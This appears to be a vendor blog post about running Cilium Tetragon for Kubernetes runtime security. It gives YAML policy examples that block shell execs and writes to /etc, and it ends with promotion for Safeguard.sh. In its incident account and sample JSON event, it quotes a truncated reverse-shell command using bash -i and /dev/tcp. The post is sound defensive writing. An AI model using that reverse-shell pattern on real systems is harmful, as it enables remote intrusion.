Container Security

Cilium Tetragon Runtime Security with eBPF

A practical look at Cilium Tetragon for Kubernetes runtime security, what eBPF gives you that audit logs do not, and where Tetragon fits in a real stack.

Shadab Khan
Security Engineer
7 min read

Tetragon is one of the few runtime security tools that actually earns its place on a production node. I have run it across two clusters that totaled about 3,000 nodes, and it has detected things that audit logs cannot see — the most dramatic being a reverse shell spawned from a Python library that had been supply-chain-compromised three weeks earlier.

What follows is the operational reality of running Tetragon in production. The marketing page does a good job explaining what eBPF is. It does not do a good job explaining what goes wrong in a real cluster, which is what an engineer actually needs to know.

What does Tetragon catch that audit logs miss?

Process execution with its full lineage, file access below the audit subsystem, and network connections attributed to the specific process that opened them — all correlated to the Kubernetes pod and container without node-side grep.

The Linux audit subsystem is decades old and it was not designed for containers. It logs events at the kernel level without knowing which container produced them, it drops events under load, and it cannot trace a process back through its ancestors cleanly when that lineage crosses a namespace boundary. eBPF-based tools like Tetragon attach to kernel probes directly and can see the full execve chain, the namespace the process is in, and the pod metadata — all from the kernel with no per-event userspace overhead.

The concrete example I mentioned: a compromised Python package in a data pipeline opened a reverse shell by spawning /bin/sh -c "bash -i >& /dev/tcp/...". The audit subsystem logged the exec. It did not correlate it to the pod or to the Python process that spawned it. Tetragon logged the full chain — pod name, container name, parent process (the Python script), the exec with its arguments, and the outbound TCP connection that followed — as a single correlated event. Triage took about four minutes. With audit logs alone, it would have taken a day.
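For a sense of what that correlation looks like on the wire: Tetragon exports each event as JSON. Below is an abridged sketch of the process_exec event from that incident, with hypothetical pod and script names; real events carry many more fields (exec IDs, PIDs, timestamps, image references).

{
  "process_exec": {
    "process": {
      "binary": "/bin/sh",
      "arguments": "-c \"bash -i >& /dev/tcp/...\"",
      "pod": {
        "namespace": "pipelines",
        "name": "etl-worker-0",
        "container": { "name": "worker" }
      }
    },
    "parent": {
      "binary": "/usr/bin/python3",
      "arguments": "ingest.py"
    }
  }
}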

How does Tetragon compare to Falco?

Falco and Tetragon solve overlapping problems and the right answer in 2026 is usually to run one, not both. Falco is older, has a larger rules library, and runs in userspace consuming kernel events via eBPF or kernel modules. Tetragon runs its logic inside eBPF programs in the kernel, which means it can enforce — not just detect — and it has lower overhead under heavy event volume.

The enforcement capability is the deciding factor for many teams. Falco detects and alerts. Tetragon can detect, alert, and optionally kill the offending process before it completes its syscall. For a reverse-shell scenario, that is the difference between an incident where you respond to the alert and one where the attacker's connection is never established.
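As a sketch of what enforcement looks like, here is a minimal TracingPolicy that kills any process in pods labeled app=api that tries to exec a shell. The namespace, label, and binary list are assumptions for illustration; the kprobe, selector, and Sigkill pieces follow Tetragon's documented policy schema, but treat this as a starting point to verify, not a drop-in rule.

apiVersion: cilium.io/v1alpha1
kind: TracingPolicyNamespaced
metadata:
  name: deny-shell-exec
  namespace: prod-api        # hypothetical namespace
spec:
  podSelector:
    matchLabels:
      app: api               # hypothetical label
  kprobes:
  - call: "sys_execve"
    syscall: true
    args:
    - index: 0
      type: "string"         # the path passed to execve
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/bin/sh"
        - "/bin/bash"
        - "/usr/bin/bash"
      matchActions:
      - action: Sigkill      # kill the caller before the shell image runs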

Where Falco still wins: rule maturity. Falco's rule ecosystem has years of production tuning behind it, and if you want a prebuilt rule for "detect kube-proxy tampering," Falco has it and Tetragon might not. If your security team is small and needs to deploy a detection layer this quarter, Falco is usually faster.

My current stack: Tetragon for enforcement of a narrow set of high-confidence policies (no exec of shell interpreters in application containers, no file writes to /etc, no outbound connections from specific pods) and a traditional SIEM pipeline for broader detection and correlation.
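The "no file writes to /etc" policy from that list might look like the sketch below, built on the security_file_permission hook that Tetragon's file-monitoring examples use. The pod label is a placeholder, and the access-mask value is an assumption to verify against your kernel and Tetragon version before enforcing.

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: deny-etc-writes
spec:
  podSelector:
    matchLabels:
      tier: app              # hypothetical label
  kprobes:
  - call: "security_file_permission"
    syscall: false
    args:
    - index: 0
      type: "file"           # the file being accessed
    - index: 1
      type: "int"            # the access mask
    selectors:
    - matchArgs:
      - index: 0
        operator: "Prefix"
        values:
        - "/etc"
      - index: 1
        operator: "Equal"
        values:
        - "2"                # assumed MAY_WRITE; confirm the mask semantics
      matchActions:
      - action: Sigkill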

What are the performance costs of running Tetragon?

Measurable but usually acceptable — typically 1 to 3 percent CPU overhead on nodes with moderate event rates, climbing to 5 to 8 percent on nodes with very high syscall volume. The costs are not uniform across workloads.

The cost drivers are event volume and the number of active tracing policies. A Kafka node doing millions of small network I/Os per second generates far more eBPF events than a web service doing a thousand HTTP requests per second, because syscall count is what matters, not request count. Tetragon's ring buffer can saturate under extreme load, at which point events are dropped, and dropped events are a silent failure mode that you need to monitor.

The setting that matters most: TracingPolicy filtering should be as narrow as possible. Do not write a tracing policy that matches every process — match only the processes you care about, using the pod label selector and the container selector. A policy that fires on every exec in the cluster will generate gigabytes of events per hour and drop a significant fraction of them.
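One concrete way to narrow the match, sketched as a policy fragment: combine the pod selector with matchBinaries so the kprobe fires only for execs initiated by the process you actually care about, rather than every exec on the node. The label and binary path here are placeholders.

spec:
  podSelector:
    matchLabels:
      app: etl                 # placeholder: only pods in this workload
  kprobes:
  - call: "sys_execve"
    syscall: true
    selectors:
    - matchBinaries:
      - operator: "In"
        values:
        - "/usr/bin/python3"   # only execs whose caller is the interpreter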

The kernel version matters as well. Older kernels have less efficient BPF verifiers and slower map operations. Tetragon on kernel 6.1 or later is meaningfully faster than on 5.15, and that can be the difference between acceptable overhead and unacceptable overhead on a busy node.

How do you write a tracing policy that does not drown you?

Start with a prohibited-action model rather than a detect-everything model. A good first policy blocks a specific dangerous action in a specific pod class, like "no exec of /bin/sh in pods labeled app=api." A bad first policy records every process exec across the cluster and asks someone to figure out what is normal.

The way I scope a new policy: identify a specific threat you believe is reachable (a supply-chain-compromised library spawning a shell), identify the pods where that threat matters (user-facing API and data pipeline workloads, not system pods), and write a narrow policy that covers only those pods. Deploy in monitor mode first. Look at the output for a week. Tune out false positives. Then turn on enforcement.
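Monitor mode in Tetragon terms is simply the same selector with no action attached: events flow to your pipeline and nothing gets killed. A sketch of the toggle, reusing the shell-exec selector from earlier:

selectors:
- matchArgs:
  - index: 0
    operator: "Equal"
    values:
    - "/bin/sh"
  # matchActions:
  # - action: Sigkill    # leave commented out until a week of output is clean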

The false-positive drivers that catch teams off guard are build processes that ship into production by accident (a container with gcc inside because someone forgot to use a multi-stage build), sidecars that legitimately exec (service meshes, observability agents), and init containers that run setup shell scripts. Each of these looks suspicious to a naive policy and each of them is fine. Your policy needs to know about them.

Where does Tetragon fit in the supply chain picture?

Tetragon is the last line of defense against supply chain compromises that made it past the build-time and admission-time checks. Signing, SBOMs, and vulnerability scanning all run before the code reaches the node. Tetragon runs on the node, watches what the code actually does, and catches the class of attack where a malicious dependency does something at runtime that no static analysis would predict.

This matters specifically for the hardest class of supply chain attack: a legitimate package that gets compromised after you have verified it, or a package with behavior that only activates under specific conditions (a time-based payload, a C2 callback, a credential-stealing routine that triggers when it sees certain environment variables). Signing and SBOMs are important, and they do not catch this. Runtime behavioral policy does.

The right way to think about this: Tetragon is not a replacement for supply chain controls upstream of it. It is the thing that tells you the upstream controls failed.

How Safeguard.sh Helps

Safeguard.sh uses Tetragon event streams alongside reachability analysis to distinguish "library has a vulnerability" from "library has a vulnerability that this pod is actively calling right now." That correlation is what drives the 60 to 80 percent reduction in alert noise that lets a security team actually respond to runtime events. Griffin AI writes Tetragon tracing policies from your SBOM-derived reachability graph, narrowing enforcement to the code paths that matter, with dependency-depth awareness down to 100 levels. TPRM correlates Tetragon-observed behavior against the expected runtime profile of third-party images. And the container self-healing module can automatically replace a pod image when runtime behavior from a compromised dependency is detected, turning a runtime alert into a runtime remediation with no human in the critical path.
